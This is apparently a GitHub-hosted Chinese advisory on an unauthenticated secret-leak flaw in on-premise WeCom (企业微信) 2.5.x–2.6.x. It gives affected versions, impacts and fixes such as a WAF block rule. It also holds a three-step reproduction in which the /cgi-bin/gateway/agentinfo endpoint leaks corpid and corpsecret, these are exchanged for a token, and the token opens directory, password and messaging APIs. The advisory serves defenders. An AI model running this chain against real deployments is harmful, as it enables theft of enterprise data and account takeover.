Skip to content

Latest commit

 

History

History
37 lines (19 loc) · 1.12 KB

企业微信(私有化版本)敏感信息泄露漏洞.md

File metadata and controls

37 lines (19 loc) · 1.12 KB

紧急通知,长亭报出企业微信存在信息泄露0day!目前已在准备预警,请注意!

企业微信URL/cgi-bin/gateway/agentinfo

接口未授权情况下可直接获取企业微信secret等敏感信息

受影响版本:2.5.x、2.6.930000、以下;

不受影响:2.7.x、2.8.x、2.9.x;

危害:

1、可导致企业微信全量数据被获取、文件获取,

2、存在使用企业微信轻应用对内发送钓鱼文件和链接等风险。

修复方法:

1、在waf上设置一个规则,匹配到/cgi-bin/gateway/agentinfo路径的进行阻断;

2、联系厂家进行获取修复包;

3、官方通报及补丁地址

复现及漏洞详情分析:

第一步:,通过泄露信息接口可以获取corpid和corpsecret

https://<企业微信域名>/cgi-bin/gateway/agentinfo

第二步,使用corpsecret和corpid获得token

https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET

第三步,使用token访问诸如企业通讯录信息,修改用户密码,发送消息,云盘等接口

https://<企业微信域名>/cgi-bin/user/get?access_token=ACCESS_TOKEN&userid=USERID